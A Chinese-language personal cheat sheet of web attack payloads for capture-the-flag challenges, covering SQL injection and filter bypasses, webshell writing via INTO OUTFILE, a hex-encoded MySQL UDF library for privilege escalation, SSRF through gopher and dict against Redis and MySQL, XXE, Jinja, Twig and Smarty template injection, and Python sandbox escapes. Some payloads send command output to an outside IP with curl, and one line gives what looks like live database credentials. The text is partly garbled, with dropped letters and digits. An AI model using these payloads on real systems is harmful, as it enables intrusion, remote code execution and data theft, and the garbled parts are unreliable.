select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains(password))

Sql注入

(select admin username, 12 password)a

创建新表

更新段表

1 ;upDate%09items%09set%09price=1%09Where%09id=8;#

有时候不一定是’闭合，可能是”

万能密码：or 1=1--

admin*\order*\by**\#

注入1：

or 1=1 order by #

a union select 1,database(), #

a union select 1,(select group_concat(table_name) from information_ where table_schema= web2 ),#

a union select 1,(select group_concat(column_name) from information_ where table_schema= web2 and table_name= flag ),#

查询的信息可以回显，说明是union注入，然后要判断字段数。

?id=TMP0919 Order by 1#

看回显

?id=1 uion Select 1,2,,4,5#

查询表名

?id=1 uion Select ((sElect grOup_cOncat(tAble_name) From infOrmation_ Where Table_schema=Database())),2,,4,5%2

查询字段名

id=1 uion Select ((sElect grOup_cOncat(column_name) From infOrmation_ WhereTable_name= here_is_flag )),2,,4,5%2

查询Flag值:

?id=1 uion Select ((sElect grOup_cOncat(flag) From here_is_flag)),2,,4,5%2

0 union select 1#

密码是1

ᴬᴰᴹᴵᴺ

^0# 分号可以用于闭合，井号可以用于注释，^进行异或运算，等号就是判等，这里需要利用sql的一个点“mysql弱类型转换”，****空异或0会查到所有非数字开头的记录

admin加空格来绕过（sql约束攻击）

userid=1 union select <?php eval($_POST[1]);?> into outfile /var/www/html/shell.php#&userpwd=1

爆破session密码

session可能在的地方 ..././..././..././etc/config.py

python .\flask_session_cookie_manager.py decode -c eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDMV1JoZEdFPSJ9fQ.XyEaww.Iwc6W-s4ACfLuJX9SYhvTPbb1k -s 82.5659952704

python .\flask_session_cookie_manager.py encode -s 82.5659952704 -t { username : b }

测试数据：

1;show databases;#

Handle注入

;handler 191981091114514 open;handler 191981091114514 read first#

拼接注入

1	;PREPARE st from concat(	s	,	elect	, 	 * from `191981091114514` 	);EXECUTE st;#

布尔盲注

if(1=1,1,sleep()) // 1=1恒成立，因此会输出1

if(1=2,1,sleep()) //1=2不成立，则会执行最后的sleep函数，延迟秒后回显

1 &&sleep(5)#

if(length((select(flag)from(flag)))=42,1,0)

id=if((ascii(substr((select(flag)from(flag)),$1$,1)))=$ace,1,0)

特殊方法

information_用mysql.innodb_table_stats代替 table_schema用database_name代替

查表名使用
select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
跳过爆字段名直接爆值

查表名
-1	/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),,4,5,6,7,8,9,10,11,12,1,14,15,16,17,18,19,20,21,	22

无列名注入（知道表名)

?username=joe	union/**/select/**/a/**/from/**/(select/**/1,2/**/as/**/a/**/union/**/select/**/*/**/from/**/flag)/**/as/**/q%2

因为没有mysql.innodb_column_stats这个方法，查不了列名大概原理就是没有列名，那就给它取名，然后按别名正常继续注入

//-1	/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),,4,5,6,7,8,9,10,11,12,1,14,15,16,17,18,19,20,21,	22

测试列数

1 /**/group/**/by/**/22,

堆叠注入

;handler FlagHere open;handler FlagHere read first#读取

1 ;PREPARE st from concat( s , elect , * from FlagHere );EXECUTE st;#

常见绕过

1.结果不允许有flag字符

if($row->username!==’flag’)

A. -1 union select to_base64(username),hex(password) from ctfshow_user2 --

不允许有flag

if(!preg_match( /flag/i , json_encode($ret))){

A. -1 union select 1,2,password from ctfshow_user where username= flag --

.不允许有数字

if(!preg_match( /flag|[0-9]/i , json_encode($ret))){

A. -1 union select replace(username, g , j ),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, 1 , A ), 2 , B ), , C ), 4 , D ), 5 , E ), 6 , F ), 7 , G ), 8 , H ), 9 , I ), 0 , J ), g , j ) from ctfshow_user4 where username= flag --

Flask题目

import( os ).popen( cat /f* ).read()

local_file:///sys/class/net/eth0/address

flask的ping值计算

1.username 启动flask的用户名 (/etc/passwd 读取）

默认值flask.app

.appname 默认flask

可通过报错信息得到 flask库下app.py的绝对路径 /etc/pass

5.uuidnode 读取/sys/class/net/eth0/address MAC地址十六进制转化为十进制根据网卡名称自行更改

（更正）/proc/sys/kernel/random/boot_id

/proc/self/cgroup 看是不是docker

/proc/sys/kernel/rand]

/etc/machine-id/proc/self/cgroup合起来才是后半段

/proc/sys/kernel/random/boot_id****/proc/self/cgroup

****import os

****os.popen( ls / ).read()

Random*random=uuidnode

****读取文件用python2

import random

random.seed(0x0242ae0295f6)

print(str(random.random()*2))

local_file:///

Flask例题

flask disk

· 考点：Phar反序列化、gzip压缩、无回显RCE

· FLAG：动态FLAG

· 解题步骤

访问admin manage发现要输入pin码，说明flask开启了debug模式。

flask开启了debug模式下，app.py源文件被修改后会立刻加载。

所以只需要上传一个能rce的app.py文件把原来的覆盖，就可以了。注意语法不能出错，否则会崩溃。

from flask import Flask,request

import os

app = Flask(name)

@app.route( / )

def index():

try:

cmd = request.args.get( cmd )

data = os.popen(cmd).read()

return data

except:

pass

return 1

if name== main :

app.run(host= 0.0.0.0 ,port=5000,debug=True)

git题目

java题目

存有web信息的XML文件

WEB-IF主要包含一下文件或目录：

/WEB-IF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。

/WEB-IF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中

/WEB-IF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件

/WEB-IF/src/：源码目录，按照包名结构放置各个java文件。

/WEB-IF/database.properties：数据库配置文件

例题

<servlet-name>FlagController</servlet-name>

<servlet-class>com.FlagController</servlet-class>

</servlet>

****filename=/WEB-IF/classes/com/wm/ctf/

Struts工具

可能在env里。

Jwt题目

（后面一定要加点）

local_file:///sys/class/net/eth0/address

XXE题目

例题1：有回显的文件读取

<?xml version=1.0?>
<!DOCTYPE xml [
<!ETITY xxe SYSTEM file:///flag>
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>

例题二:无回显

%remote; %send; ]>

SSRF题目

file协议

在有回显的情况下，利用 file 协议可以读取任意文件的内容

dict协议

泄露安装软件版本信息，查看端口，操作内网redis服务等

gopher协议

gopher支持发出GET、POST请求。可以先截获get请求包和post请求包，再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell

例题

打mysql无密码

python2 gopherus.py --exploit mysql
root
select <?php @eval($_POST[	cmd	]);?> into outfile 	/var/www/html/aa.php	;

mysql读取任意文件漏洞

1.在腾讯服务器上开rough服务监听，受害机连接，输入指令获得。

远程连接

 mysql -h 1.14.108.19 -P 06 -u root -pygyjl694YG. blog

写马

通杀大全

基于UIO联合查询： #

?id=1 UIO ALL SELECT 1,	<?php phpinfo();?>	, into outfile 	C:\info.php	%2
?id=1 UIO ALL SELECT 1,	<?php phpinfo();?>	, into dumpfile 	C:\info.php	%2

非联合查询 #

当我们无法使用联合查询时，我们可以使用fields terminated by与lines terminated by来写shell

?id=1 into outfile 	C:\info.php	 FIELDS TERMIATED BY 	<?php phpinfo();?>	%2

mysql进行root权限提取

总结

show global variables like %secure% ;

选项 secure_file_priv 用于限制导入和导出的数据目录

如果为空，不做目录限制，即任何目录均可以

如果设置为 ULL ，MySQL 服务器禁止导入与导出功能

直接写webshell会发现没有web根路径的权限

换一个思路可以通过udf提权执行系统命令

plugin_dir 选项用于指定插件目录

show global variables like %plugin% ;

so文件写法：

SET @file_content = LOAD_FILE(	C:/Users/admin/Desktop/lib_mysqludf_sys_64.so	);
ISERT ITO people (cmd) VALUES (HEX(@file_content));

SELECT hex(load_file(	/lib_mysqludf_sys_64.so	));

写入so文件

SELECT 0x7f454c46020101000000000000000000000e0001000000d00c0000000000004000000000000000e818000000000000000000004000800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d00000016000000000000001000000000000000000000012000000200000010000000250000001a0000000f000000000000000000000000000000000000001b0000000000000000000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c000000000000000000000000000000000000000000000002000000000000001100000014000000020000000700000080080499119c4c9da44009804688140000001600000017000000190000001b0000001d000000200000002200000000000000200000000000000240000002500000027000000290000002a00000000000000ce2cc0ba67c7690ebdef0e78722788b98df10ed871581cc1e2f7dea868be12bbe927c7e8b92cd1e7066a9cf9bfba745bb0771974ec445d5ecc5a62c1cc18aff6ac68aeb9fd4a0ac7d1c525681b20b5911feab5fbe12000000000000000000000000000000000000000000000000000000000000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba000000120000000000000000000000504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c0078110000000000000000000000000000f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c0100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a01000012000b00f7100000000000004100000000000000900000012000b00a40d0000000000000100000000000000201000012000b00ea0f000000000000000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d0000000000000000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f7746172745f5f005f66696e69005f5f678615f66696e616c697a65005f4a765f52656769774657246c6177657006c69625f6d797716c7564665f77975f696e666f5f6465696e69740077975f6765745f6465696e69740077975f65786565f6465696e69740077975f6576616c5f6465696e69740077975f62696e6576616c5f696e69740077975f62696e6576616c5f6465696e69740077975f62696e6576616c00666f726b00779766f6e66006d6d617000774726e6707900776169747069640077975f6576616c006d616c6c6f600706f70656e007265616c6c6f600666765747007066c6f7650077975f6576616c5f696e69740077472670790077975f65786565f696e69740077975f765745f696e69740077975f6765745f696e6974006c69625f6d797716c7564665f77975f696e666f006c69625f6d797716c7564665f77975f696e666f5f696e69740077975f657865600779774656d0077975f765740076574656e760077975f765745f6465696e697400667265650077975f67657400676574656e76006c696262e76f2e6005f6564617461005f5f62775f774617274005f656e6400474c494245f22e22e5000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d8162000000000000600000000000000000000000000000e016200000000000060000000a0000000000000000000000001720000000000007000000040000000000000000000000081720000000000007000000050000000000000000000000101720000000000007000000060000000000000000000000181720000000000007000000070000000000000000000000201720000000000007000000080000000000000000000000281720000000000007000000090000000000000000000000017200000000000070000000a0000000000000000000000817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f000000000000000000000060172000000000000700000010000000000000000000000068172000000000000700000011000000000000000000000070172000000000000700000012000000000000000000000078172000000000000700000010000000000000000000000488ec08e827010000e8c2010000e88d050000488c408cff520b2000ff2540b20000f1f4000ff2520b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b2000680000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e90ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff0000000000000000488ec08488b05f50920004885c07402ffd0488c408c9090909090909090905580d900a2000004889e5415457562488dd809200000740c488bd6f0a2000e812ffffff488d0510820004c8d2504082000488b15650a20004c29e048c1f80488d58ff489da7200f1f440000488d4201488905450a200041ff14c4488b15a0a2000489da72e5c605260a2000015b415cc9c660f1f84000000000055488dbf072000004889e57422488b0550920004885c07416488dda70720004989cc941ffe0f1f840000000000c9c9090cccc1c0cc4154488c9ff4989f4555488ec10488b4610488b81c0f2ae48f7d1488d69ffe8b6feffff8f80089c77c61754fbf1e000000e80feffff488d70ff451c9451c01ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff488f8ff4889c7427498b4424104889ea4889df488b0e852feffffffdeb0cba010000001f6e802feffff1c0eb05b8010000005a595b5d415cc4157bf0004000041564155451ed41545554889f488ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b410488d56a00000488b8e814feffff4989c7eb74c89f71c0488c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8dc284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff001c0488c9ff4889eff2ae488b44241048f7d148ffc9488908488c4184889e85b5d415c415d415e415fc488ec088e014889d7750b488b46081d28800740e488d5a020000e817fdffffb20188d05ec488ec088e014889d7750b488b46081d28800740e488d511020000e8eefcffffb20188d05fc554889fd54889d488ec088e027409488d519020000ebf488b460888007409488d526020000eb2dc7400400000000488b4618488b8488c7024807808e801fcffff1d24885c0488945107511488d51f0200004889dfe887fcffffb20141585b88d05dc488ec088e014889f94889d77510488b460888007507c601011c0eb0e488d576010000e85fcffffb0014159c4154488d5ef0100004989cc4889d754889d488ec08e82fcffff49c704241e0000004889d8415a5b415cc488ec081c08e004889d7740e488d5d5010000e807fcffffb001415bc488ec08488b4610488b8e862fbffff5a4898c488ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6fa44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6fa44c89c64c89cf498b4218488b400841c6040000e867fbffff488c4284898c488b7f104885ff7405e912fbffffc554889cd54c89c488ec08488b4610488b8e849fbffff4885c04889c27505c6001eb151c0488c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc9090909090909090554889e55488ec08488b05c802000488f8ff7419488d1dbb020000f1f00488eb08ffd0488b0488f8ff75f1488c4085bc9c9090488ec08e86ffbffff488c408c457870656746564206578616746c79206f6e652077472696e67207479706520706172616d6574657200457870656746564206578616746c792074776f20617267756d656e747004578706567465642077472696e67207479706520666f72206e616d6520706172616d657465720046f756c64206e6f7420616c6c6f6617465206d656d6f7279006c69625f6d797716c7564665f7797207665727696f6e2002e02e4004e6f20617267756d656e74720616c6c6f7765642028756466a206c69625f6d797716c7564665f77975f696e666f290000011b0b980000001200000040fbffffb400000041fbffffcc00000042fbffffe40000004fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000ffcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000efdffff2c02000002feffff4402000016feffff5c02000084feffff740200009feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff0100000000000000000000001400000040000006dfaffff010000000000000000000000140000004c00000056faffff0100000000000000000000001400000064000000ffaffff010000000000000000000000140000007c00000028faffff0000000000000000000000014000000940000001faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e080486000000000004000000d40000006efaffffe800000000420e10470e18420e208d048e08f02450e28410e0410e880786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c000000c01000040fbffff6a00000000410e108602440e1880470e200000140000005c0100008afbffff000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e1880470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e00000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e1880470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a0020000000000000500000000000000680700000000000006000000000000006000000000000000a00000000000000e0010000000000000b000000000000001800000000000000000000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c000000000000e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004744a202844656269616e2042e2e22d12e1292042e2e200004744a202844656269616e2042e2e22d12e1292042e2e200004744a202844656269616e2042e2e22d12e1292042e2e200004744a202844656269616e2042e2e22d12e1292042e2e200004744a202844656269616e2042e2e22d12e1292042e2e200002e76877472746162002e676e752e6861768002e64796e7796d002e64796e77472002e676e752e7665727696f6e002e676e752e7665727696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e6746f727002e64746f727002e6a672002e64796e616d696002e676f74002e676f742e706c74002e64617461002e6277002e66f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f000000050000000200000000000000580100000000000058010000000000004801000000000000000000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c00000000000000000000000000000008000000000000000000000000000000150000000b000000020000000000000060000000000000060000000000000008040000000000000400000002000000080000000000000018000000000000001d0000000000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f0200000000000000480900000000000048090000000000005600000000000000000000000000000020000000000000002000000000000002000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c0090000000000006000000000000000000000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a000000000000800100000000000000000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e00000000000000000000000000000004000000000000000000000000000000670000000100000020000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001000000000000001000000000000140200000000000000000000000000000800000000000000000000000000000087000000010000000000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e00000001000000000000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000000000000000000081520000000000081500000000000008000000000000000000000000000000080000000000000000000000000000009a00000006000000000000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a00000001000000000000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a800000001000000000000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b100000001000000000000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b700000008000000000000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b0000000000000000000000000000000100000000000000000000000000000001000000000000000000000000000000000000000000000218000000000000c500000000000000000000000000000001000000000000000000000000000000 ITO DUMPFILE /usr/lib/mysql/p1ugin/udf.so ;

CREATE FUCTIO sys_eval RETURS STRIG SOAME udf.so ;

select sys_eval( env );

url要进行二次编码

打redis

curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURTRASFER, 1);特征

python2 gopherus.py --exploit redis
phpshell
<?php eval($_POST[	cmd	]);?>

gopher://127.0.0.1:679/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A%250D%250A%2524%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%25C%25Fphp%2520eval%2528%2524_POST%255B1%255D%2529%25B%25F%25E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%2524%250D%250Aset%250D%250A%2524%250D%250Adir%250D%250A%25241%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%2524%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

1是密码

主从复制redis

dict协议分步解决：

  	dict://127.0.0.1:679/info	);
  	dict://127.0.0.1:679/config:set:dir:/tmp	); //设置目录
  	dict://127.0.0.1:679/config:get:dir	); //获取
  	dict://127.0.0.1:679/config:set:dbfilename:exp.so	);
  	dict://127.0.0.1:679/slaveof:49.22.224.59:679	);
  	dict://127.0.0.1:679/module:load:./exp.so	); //加载exp.so
  	dict://127.0.0.1:679/:env	); //命令执行go

gopher一次解决：打开/tmp/redis，先运行得到payload，再python2运行server接受。

http/s协议：探测内网主机存活

[file:///var/www/html/flag.php](file://var\www\html\flag.php)  ---看网页源代码

url=http://127.0.0.1/flag.php 

http:/// http:/// http://wifi.aliyun/ http://imis.qq/ http://localhost.sec.qq/ http:/// 

出来时127.0.0.1

url=http://2107064/flag.php

url=http://sudo/flag.php  dns解析

url=http://0177.0.0.1/flag.php

十六进制

url=http://0x7F.0.0.1/flag.php

八进制

url=http://0177.0.0.1/flag.php

10 进制整数格式

url=http://2107064/flag.php

16 进制整数格式，还是上面那个网站转换记得前缀0x

url=http://0x7F000001/flag.php

还有一种特殊的省略模式

127.0.0.1写成127.1

用CIDR绕过localhost

url=http://127.127.127.127/flag.php

还有很多方式不想多写了

url=http://0/flag.php

url=http://0.0.0.0/flag.php

http://nginx：80/flag.php

http://＠nginx/flag.php

http://nginx／flag.php

长度小于5
http://127.1／flag.php
http://0/flag.php

在自己的vps上写一个php文件，内容为

<?php header(Location:http://127.0.0.1/flag.php);?>

然后POST传参

例题1：

代码中正则的意思是url要以http://ctf.开头，且以show结尾

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST[	url	];
$x=parse_url($url);
if(preg_match(	/^http:\/\/ctf\..*show$/i	,$url)){
    echo file_get_contents($url);
}

那么可以构造一下绕过

url=http://ctf.@127.0.0.1/flag.php?show

此处ctf.将作为账号登录127.0.0.1，并且向flag.php传一个show参数来绕过

SSTL题目

twig模板

{{_registerUndefinedFilterCallback(exec)}}{{_getFilter(cat /flag)}}

smarty

一，漏洞确认(查看smarty的版本号)：
{$smarty.version}
二，常规利用方式：（使用{php}{/php}标签来执行被包裹其中的php指令，smarty弃用）
{php}{/php}
执行php指令，php7无法使用

<script language=php>phpinfo();</script>

三，静态方法
public function getStreamVariable($variable){ $_result = 		; $fp = fopen($variable, 	r	); if ($fp) { while (!feof($fp) && ($current_line = fgets($fp)) !== false) { $_result .= $current_line; } fclose($fp); return $_result; } $smarty = isset($this->smarty) ? $this->smarty : $this; if ($smarty->error_unassigned) { throw new SmartyException(	Undefined stream variable 	 . $variable . 		); } else { return null; } }

payload1:（if标签执行PHP命令）
{if phpinfo()}{/if}
{if system(	ls	)}{/if}
{if system(	cat /flag	)}{/if}
四，其他payload
{Smarty_Internal_Write_File::writeFile($SCRIPT_AME,<?php passthru($_GET[	cmd	]); ?>,self::clearConfig())}

jinjia

读取模块

`<class 	_frozen_importlib_external.FileLoader	>`

`subprocess.Popen`

使用：{{		.__class__.__mro__[2].__subclasses__()[258](	cat /flasklight/coomme_geeeett_youur_flek	,shell=True,stdout=-1)municate()[0].strip()}}

查脚本
import requests

url = 	http://buuoj:81	
for i in range(1, 100):
    payload = /?search={{		.__class__.__mro__[2].__subclasses__()[  str(i)  ].__init__[	__glo		bals__	]}}
    newurl = url  payload
    res = requests.get(url=newurl  payload)
    if 	builtins	 in :
        print(newurl)
    else:
        pass

利用{{ .__class__.__mro__[2].__subclasses__()[76].__init__[ __glo bals__ ][ __builtins__ ][ eval ](__import__( os ).popen( ls ).read())}}

过滤单双引号

?a=os&b=popen&c=cat /flag&name={{url_for.globalsrequest.args.a(request.).read()}}

过滤了args，换其他参数传值即可

Args->cookie

过滤[]

?name={{url_for.globals.os.popen(a).read()}} Cookie:a=cat /flag

过滤了下划线，我们可以使用attr方法，request|attr(a)等价于request[“a”]?

name={{(lipsum|attr(a)).os.popen(b).read()}}

__绕过

class==\x5f\x5fclass\x5f\x5f==\x5f\x5f\x6\x6c\x61\x7\x7\x5f\x5f

使用get传参，构造参数：

Cookie=x1=init;x2=globals;x=getitem;x4=builtins;x5=import( os ).popen( cat /flag ).read()

.过滤

|attr(class)

相当于

.class

过滤.{{,__,

txt.galf_eht_si_siht/ tac [::-1]) 反方向绕过

Cookie:a=globals;b=cat /flag

过滤{{

{% print(get_flashed_messages.globals.ospopen.read()) %}

过滤popen

q=[].class.base.subclasses()[189].init.globals builtins ( os ).dict pop en .read()

无回显sstl堆区

/hack?klf={{config.class.init.globals[ os ].popen( tac /f* ).read()}读取

/hack?klf={{config.class.init.globals[ os ].popen( curl 120.46.41.17:902 ).read()}}

/hack?klf={{config.class.init.globals[ os ].popen( curl 120.46.41.17:902/ls /app/f* ).read()}}

Payload:?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}{%set k=dict(eeeeeeeee=a)|join|count%}{%set l=dict(eeeeeeee=a)|join|count%}{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|count%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(vhthja=a)|join,q,dict(dnslog=a)|join,q,dict(cn=a)|join)|join%}{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}atao{%endif%}

沙盒逃逸

最普通： import(os).system(cat flag)

无参数b和i，单引号，双引号，反引号

getattr(getattr(()class__,chr(95)*chr(95)*chr(98)*chr(97)*chr(115)*chr(101)*chr(95)*chr(95)),chr(95)*chr(95)*chr(115)*chr(117)*chr(98)*chr(99)*chr(108)*chr(97)*chr(115)*chr(115)*chr(101)*chr(115)*chr(95)*chr(95))()

到()class.base.subclasses()[-4].init****.globals__ system

构造同理

